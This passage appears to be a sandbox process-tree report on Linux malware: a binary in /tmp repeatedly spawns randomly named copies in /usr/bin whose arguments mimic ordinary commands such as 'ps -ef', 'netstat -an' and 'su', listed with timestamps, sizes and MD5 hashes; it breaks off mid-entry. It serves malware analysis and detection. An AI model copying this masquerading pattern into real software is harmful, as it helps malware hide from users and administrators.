                                                            Arguments:/usr/bin/whtzopaggc "echo \"find\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:/usr/bin/whtzopaggc "grep \"A\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:/usr/bin/whtzopaggc bash 9446
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:10
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:/usr/bin/whtzopaggc gnome-terminal 9446
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:/usr/bin/whtzopaggc "netstat -an" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:11
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/whtzopaggc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:3fa295ff1f014fb5dd96c4434909ec39

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:/usr/bin/kmavqzvhro bash 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:/usr/bin/kmavqzvhro ifconfig 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:/usr/bin/kmavqzvhro "ps -ef" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:/usr/bin/kmavqzvhro "route -n" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:/usr/bin/kmavqzvhro whoami 9446
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:16
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/kmavqzvhro
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:a39f4dbba50225792bc678e0ae044ef5

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:/usr/bin/zetazkptwu "ps -ef" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:/usr/bin/zetazkptwu gnome-terminal 9446
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:21
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:/usr/bin/zetazkptwu "ifconfig eth0" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:/usr/bin/zetazkptwu who 9446
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:/usr/bin/zetazkptwu "ls -la" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:22
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/zetazkptwu
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:293bbabe5dde95c14afaf88a1fbbcb66

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:/usr/bin/jvzzirmjsa su 9446
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:/usr/bin/jvzzirmjsa bash 9446
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:/usr/bin/jvzzirmjsa "cat resolv.conf" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:/usr/bin/jvzzirmjsa "grep \"A\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:/usr/bin/jvzzirmjsa "echo \"find\"" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:27
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/jvzzirmjsa
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:0ba3c89d8717188f9c145cab884813ba

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:/usr/bin/gkckltchoc pwd 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:/usr/bin/gkckltchoc id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:32
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:/usr/bin/gkckltchoc "ls -la" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:/usr/bin/gkckltchoc ifconfig 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:/usr/bin/gkckltchoc "netstat -an" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:33
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/gkckltchoc
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:ff61e50427f02a493dd897777ec8a42f

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:/usr/bin/rlxosagpct ifconfig 9446
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:/usr/bin/rlxosagpct pwd 9446
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:/usr/bin/rlxosagpct id 9446
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:/usr/bin/rlxosagpct pwd 9446
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:/usr/bin/rlxosagpct whoami 9446
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:38
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/rlxosagpct
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:b51f6012587970272ce94c23f6c52f3a

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:/usr/bin/pnljtnsppb "netstat -antop" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:/usr/bin/pnljtnsppb who 9446
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:43
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:/usr/bin/pnljtnsppb "ifconfig eth0" 9446
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
                                                            Arguments:n/a
                                                            File size:625889 bytes
                                                            MD5 hash:40692a3a476d75da8623f32327526dd6

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/tmp/dkuidbsedp
                                                            Arguments:n/a
                                                            File size:625878 bytes
                                                            MD5 hash:37542894283b8851469753de69c0bcdc

                                                            Start time:09:49:44
                                                            Start date:27/07/2022
                                                            Path:/usr/bin/pnljtnsppb
